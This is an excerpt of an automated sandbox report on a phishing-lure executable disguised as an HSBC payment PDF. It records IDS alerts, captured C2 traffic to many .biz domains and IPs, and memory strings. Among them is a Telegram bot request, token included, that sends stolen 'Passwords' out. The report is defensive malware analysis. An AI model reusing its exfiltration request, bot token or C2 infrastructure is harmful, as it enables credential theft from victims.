              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6F690h5_2_05D6F3E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6EDE0h5_2_05D6EB38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D6E530h5_2_05D6E288
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D68D59h5_2_05D68AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05D684A9h5_2_05D68200

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:64298 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49716 -> 54.244.188.177:80
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:63892 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49872 -> 82.112.184.197:80
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49736 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1904d11bd5d8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewIP Address: 172.234.222.143 172.234.222.143
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49727
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49727
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49702
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49702
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49709
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49709
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49972
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49972
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49966
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49966
              Source: global trafficHTTP traffic detected: POST /mgppdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 898
              Source: global trafficHTTP traffic detected: POST /leanpmxsxneexgiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /udp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: POST /hfsfqfqbrwib HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /bd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /opymuwnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET /opymuwnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /opymuwnb?usid=26&utid=9416579686 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /meqybx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /tydyiliq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /hncx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /fprrydnqfsccl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /kp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /hptny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /sqemlirtfccimfo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /vcyisuboorqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /peioi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /ymdlhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /mepglnjkcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET /mepglnjkcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49715 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET /opymuwnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /opymuwnb?usid=26&utid=9416579686 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /mepglnjkcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
              Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
              Source: global trafficDNS traffic detected: DNS query: przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: ww99.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: zlenh.biz
              Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
              Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
              Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
              Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
              Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
              Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
              Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
              Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
              Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
              Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww99.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
              Source: unknownHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1904d11bd5d8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
              Source: armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/3VX&
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/3VX&
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/8Va&
              Source: armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/tydyiliq
              Source: armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/tydyiliq1
              Source: armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
              Source: armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/bd
              Source: armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/3VX&
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/I$o
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/NU$
              Source: armsvc.exe, 00000004.00000003.1354308285.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/leanpmxsxneexgiv
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346799710.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/mgppdv
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/mgppdv
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/OV
              Source: armsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fprrydnqfsccl
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hncx
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knjghuig.biz/
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRm
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/K
              Source: armsvc.exe, 00000004.00000003.1501939823.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/opymuwnb
              Source: armsvc.exe, 00000004.00000003.1693479400.0000000001F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
              Source: armsvc.exe, 00000004.00000003.1745306096.0000000001F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: armsvc.exe, 00000004.00000003.1746193231.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1746599342.0000000001F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://comments.adobe.io
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://comments.adobe.io/schemas/annots_metadata.jsonld
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://comments.adobe.io/schemas/bulk_entity_v1.json
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://comments.adobe.io/schemas/user_comment_metadata_result_v1.json
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://dc-api.adobe.io/discovery
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://dc-api.adobe.io/discoverySoftware
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://dc-api.adobe.io/schemas/discovery_v1.json
              Source: AdobeCollabSync.exe.4.drString found in binary or memory: https://dc-api.adobe.io/schemas/folder_listing_v1.json
